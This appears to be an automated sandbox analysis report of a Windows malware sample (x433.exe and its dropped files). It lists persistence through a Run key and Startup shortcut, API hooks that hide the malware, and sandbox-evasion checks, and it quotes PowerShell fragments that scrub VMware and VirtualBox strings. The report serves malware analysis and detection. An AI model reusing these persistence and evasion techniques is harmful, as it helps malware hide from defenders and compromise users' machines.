Source: x4usb.exe.2.dr, KgvNpQFD1pgyslmvoLVzYtqStdU0vY.cs High entropy of concatenated method names: '_8OqKNdBpQOiP48byjobgpYdKjvomXU', 'bSMJ4wPTjULuRIGy20UVskepWllP8tk4XXKMa9hhWQ4xSP9EjJMUqTPO4upHSn5rtUuCwfq9Gr4oZSRYZE5uKPuqxQKdonuya', 'wKT6cqounpHYRYFCkj4gBtSbVwIDF60ELB01T92h8bh6mYlu0i92K6L8ZXsf4XHyaAi0s6qGfXrcIK6okzaEJXTR1NZBhKKJ3', 'FQKjPf2hqoC1UlXmUSQMOVlJtO41IdIgkPZql4wdu4YM059Qm8JumuCUvPqQvXel1aTrhIdZcx7JdoYlxAavrNAiKQ4Cqx3a6', 'p2o0lampFTBN00Sl2Ly0kao2KUg8HEgfgNWBsGWwrRNVRf3xcSm1prkmpTZ37cJnWU6TxDbV3JzbDLvYcTDQMtw0REG1BG3Eo'
Source: x4usb.exe.2.dr, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.cs High entropy of concatenated method names: 'OJnYUbLkwSxKjmU6fKV2Hlw1IQDrrJ', 'tvU9fWfrnnauFESq3CZMjJqgWzCcQiVr8uOuybtYGmaAmLPTrBRbSmpeagqUwJ0IALVMMAlEq32BxT15HJetiYKVXqlBwiRN1', 'k27RKeDihzBbcaefRpL4TKPMWxclxn8k5c0RxZP7mcnpWucKutGtmjKZrYx20HvHIzkMsxzKuui79OmMLiSyzphYgEiKf93jl', 'Kdk7fsQFZWfb1NTSDwX0JpPEu3wN1ciOsKyPwnWHaTkkzFYlgvY2wLJUeOMcOnyeSOxZT6WHdCzt3OQdLa8', 'ZNCH16SUBJBa1infvnuYgiLTJaADVvvCpDUyOhAylbPs8EBspiKDd2NBofvowFjy7xlhRV6MgZ2dosI75Nq'

Persistence and Installation Behavior

Source: C:\Windows\System32\lsass.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\x433.exe File created: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe
Source: C:\Users\user\Desktop\x433.exe File created: C:\Users\user\AppData\Local\Temp\x4host.exe
Source: C:\Users\user\AppData\Local\Temp\x4host.exe File created: C:\Users\user\AppData\Local\x4usb.exe
Source: C:\Users\user\AppData\Local\Temp\x4host.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4usb.lnk
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 1_2_0078CBD0
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run x4usb

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE x4stager
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,FindCloseChangeNotification,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,FindCloseChangeNotification,CloseHandle, 5_2_0000000140001868
Source: C:\Users\user\AppData\Local\Temp\x4host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: x4host.exe, 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: x433.exe, 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, x4host.exe.0.dr, x4usb.exe.2.dr Binary or memory string: SBIEDLL.DLLCUSJ8UQGKRLJNAXNT6GA7PCHOZROFCGCGMCV8A058YIW0ANSSVE5NMBP6ECJ9C3ENP6LCC0XTD9NV4P7SATWGKGWWJELNDNAHWQXHACY0AU8TTKZQCF12VXLCJIRVTHCKGNAFSA5CGSAWHAT4K7J1VB1XD74A4TSL12K5XOHQWCJI4W892GJTBHNET83WZF0MCJXDIWABCIQC37A7I0UGRNSGGQQM7NQSUICKFAQPDZ07GCG2LARGGN4N1KWBHJS17GG8OHYIDD7YHJPCRVPH9BRUFE6NFMN75VIF57OYMQFBGLNYCCBWATT1ULITUI2D0YNXOOJSIMUSEE1FIR8CT9RQERHPOWMZELSR6COGPNCZ7FDR6FIPICQZQZYCNWRH85Q3YCY3JB8QDF4YUKFYY0VINFO
Source: C:\Users\user\Desktop\x433.exe Memory allocated: A90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\x433.exe Memory allocated: 1A990000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Memory allocated: 30B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Memory allocated: 1B180000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\x4usb.exe Memory allocated: D60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\x4usb.exe Memory allocated: 1AA70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\x433.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\x4usb.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Window / User API: threadDelayed 8461
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Window / User API: threadDelayed 1364
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4768
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3338
Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 470
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 7592
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 2408
Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 9964
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 1173
Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9855
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\lsass.exe API coverage: 9.1 %
Source: C:\Windows\System32\svchost.exe API coverage: 5.2 %
Source: C:\Windows\System32\svchost.exe API coverage: 5.0 %
Source: C:\Windows\System32\svchost.exe API coverage: 5.7 %
Source: C:\Users\user\Desktop\x433.exe TID: 6616 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\x4host.exe TID: 6620 Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2000 Thread sleep count: 4768 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2000 Thread sleep count: 3338 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3444 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 6992 Thread sleep count: 470 > 30
Source: C:\Windows\System32\dllhost.exe TID: 6992 Thread sleep time: -47000s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 3152 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6524 Thread sleep count: 7592 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6524 Thread sleep time: -7592000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6524 Thread sleep count: 2408 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6524 Thread sleep time: -2408000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 6552 Thread sleep count: 9964 > 30
Source: C:\Windows\System32\lsass.exe TID: 6552 Thread sleep time: -9964000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6764 Thread sleep count: 1173 > 30
Source: C:\Windows\System32\svchost.exe TID: 6764 Thread sleep time: -1173000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 6788 Thread sleep count: 9855 > 30
Source: C:\Windows\System32\dwm.exe TID: 6788 Thread sleep time: -9855000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6808 Thread sleep count: 250 > 30
Source: C:\Windows\System32\svchost.exe TID: 6808 Thread sleep time: -250000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7076 Thread sleep count: 252 > 30
Source: C:\Windows\System32\svchost.exe TID: 7076 Thread sleep time: -252000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7116 Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 7116 Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7092 Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 7092 Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3608 Thread sleep count: 197 > 30
Source: C:\Windows\System32\svchost.exe TID: 3608 Thread sleep time: -197000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1104 Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 1104 Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5696 Thread sleep count: 239 > 30
Source: C:\Windows\System32\svchost.exe TID: 5696 Thread sleep time: -239000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2380 Thread sleep count: 246 > 30
Source: C:\Windows\System32\svchost.exe TID: 2380 Thread sleep time: -246000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2932 Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 2932 Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5432 Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 5432 Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1436 Thread sleep count: 243 > 30
Source: C:\Windows\System32\svchost.exe TID: 1436 Thread sleep time: -243000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1196 Thread sleep count: 238 > 30
Source: C:\Windows\System32\svchost.exe TID: 1196 Thread sleep time: -238000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1704 Thread sleep count: 252 > 30
Source: C:\Windows\System32\svchost.exe TID: 1704 Thread sleep time: -252000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6908 Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 6908 Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7052 Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 7052 Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6672 Thread sleep count: 250 > 30
Source: C:\Windows\System32\svchost.exe TID: 6672 Thread sleep time: -250000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7088 Thread sleep count: 242 > 30
Source: C:\Windows\System32\svchost.exe TID: 7088 Thread sleep time: -242000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2000 Thread sleep count: 245 > 30
Source: C:\Windows\System32\svchost.exe TID: 2000 Thread sleep time: -245000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6964 Thread sleep count: 248 > 30
Source: C:\Windows\System32\svchost.exe TID: 6964 Thread sleep time: -248000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7048 Thread sleep count: 238 > 30
Source: C:\Windows\System32\svchost.exe TID: 7048 Thread sleep time: -238000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6976 Thread sleep count: 250 > 30
Source: C:\Windows\System32\svchost.exe TID: 6976 Thread sleep time: -250000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4420 Thread sleep count: 248 > 30
Source: C:\Windows\System32\svchost.exe TID: 4420 Thread sleep time: -248000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6320 Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 6320 Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\spoolsv.exe TID: 5288 Thread sleep count: 188 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 5288 Thread sleep time: -188000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2180 Thread sleep count: 226 > 30
Source: C:\Windows\System32\svchost.exe TID: 2180 Thread sleep time: -226000s >= -30000s
Source: C:\Users\user\AppData\Local\x4usb.exe TID: 5840 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5716 Thread sleep count: 227 > 30
Source: C:\Windows\System32\svchost.exe TID: 5716 Thread sleep time: -227000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1352 Thread sleep count: 239 > 30
Source: C:\Windows\System32\svchost.exe TID: 1352 Thread sleep time: -239000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4544 Thread sleep count: 62 > 30
Source: C:\Windows\System32\svchost.exe TID: 4544 Thread sleep time: -62000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1984 Thread sleep count: 61 > 30
Source: C:\Windows\System32\svchost.exe TID: 1984 Thread sleep time: -61000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\x4host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\x4host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\x4host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\x4host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\x4usb.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A6E630 FindFirstFileExW, 5_2_000002D8B0A6E630
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC64E630 FindFirstFileExW, 6_2_00000225DC64E630
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AEE630 FindFirstFileExW, 7_2_00000202C0AEE630
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A66130E630 FindFirstFileExW, 8_2_000002A66130E630
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE26E630 FindFirstFileExW, 9_2_000002BAAE26E630
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879CE630 FindFirstFileExW, 10_2_0000026A879CE630
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537AE630 FindFirstFileExW, 11_2_00000179537AE630
Source: C:\Users\user\Desktop\x433.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\x4usb.exe Thread delayed: delay time: 922337203685477
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.dr Binary or memory string: VMware SATA CD00
Source: svchost.exe, 0000000E.00000002.2961583336.000001845AC2B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.dr Binary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.dr Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000029.00000000.1906283750.0000023D1002B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1906340282.0000023D10043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2956233621.0000023D10043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2975747132.0000023D10900000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2954926787.0000023D1002B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000021.00000000.1866915131.000002644A702000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.16.dr Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.16.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 00000008.00000002.2956012355.000002A66062A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.16.dr Binary or memory string: VMCI: Using capabilities (0x1c).
Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.dr Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
Source: x4usb.exe.2.dr Binary or memory string: vmware
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.dr Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000010.00000000.1798422088.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2955107505.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.16.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 00000021.00000000.1866560549.000002644A640000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000.ifo
Source: svchost.exe, 00000010.00000000.1800562780.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dowvmci
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.dr Binary or memory string: VMware
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.16.dr Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: svchost.exe, 00000021.00000002.2948190504.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.dr Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 00000021.00000000.1866915131.000002644A702000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
Source: x4host.exe, 00000002.00000002.3000681433.000000001C086000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJJ
Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.dr Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: svchost.exe, 00000021.00000000.1866915131.000002644A702000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.16.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: dwm.exe, 00000009.00000002.3038914037.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
